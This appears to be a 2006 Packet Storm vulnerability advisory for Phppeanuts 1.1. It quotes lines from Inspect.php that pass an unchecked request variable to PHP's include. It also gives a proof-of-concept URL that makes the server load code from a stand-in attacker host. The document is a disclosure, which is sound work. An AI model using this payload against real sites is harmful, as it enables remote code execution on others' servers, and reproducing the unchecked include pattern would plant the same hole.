phppeanuts-rfi.txt

2006-11-16T00:00:00
ID PACKETSTORM:52181
Type packetstorm
Reporter Hidayat Sagita
Modified 2006-11-16T00:00:00

Description

                                        
                                            `.:: Preface ::.  
  
Type : Remote File Include  
Scripts : Phppeanuts 1.1  
Download : http://scripts.ringsworld.com/development-tools/phppeanuts-1-1.zip  
Founder : Hidayat Sagita aka bomm_3x  
Contact : hidayat.sagita[at]gmail[dot]com  
  
.:: What ? ::.  
  
In Inspect.php file on line :  
  
4. if ( isSet($_REQUEST["Include"]) )  
5. include $_REQUEST["Include"];  
  
Variable "Include" not verified first before being used.  
  
.:: Proof Of Concept ::.  
  
http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://yoursite/evil_code.txt ?  
  
.:: Shoutz ::.  
  
eCHo staff, az001 and All newbz.  
`